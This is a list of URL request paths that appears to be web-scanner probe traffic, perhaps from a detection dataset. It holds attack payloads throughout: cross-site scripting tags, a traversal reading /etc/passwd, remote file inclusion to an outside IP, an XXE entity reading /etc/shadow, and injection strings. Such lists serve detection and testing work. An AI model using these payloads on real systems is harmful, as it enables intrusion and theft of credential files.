/javascript/htpasswd.exe
/<script>cross_site_scripting.nasl</script>.idc
/manager/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00
/path0/path1/path2/path3/?payload="><img src=x onerror=window.open('https://www.google.com/');>
/j4drbkil.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgibin/htimage.exe/path/filename?2,2
/script_path/config.inc.php?_path=http://192.168.202.96:8080/txenjrxf3??
/javascript/00.exe
/javascript/.htaccess.sfish/"`false`"
/cgi-bin//_vti_bin/fpcount.exe?page=default.htm|image=3|digits=15
/path0/?payload=<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>
/path0/?payload="<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
/phpmyadmin/documentation.html?phpmyadmin='"'");|]*{%0d%0a<%00>
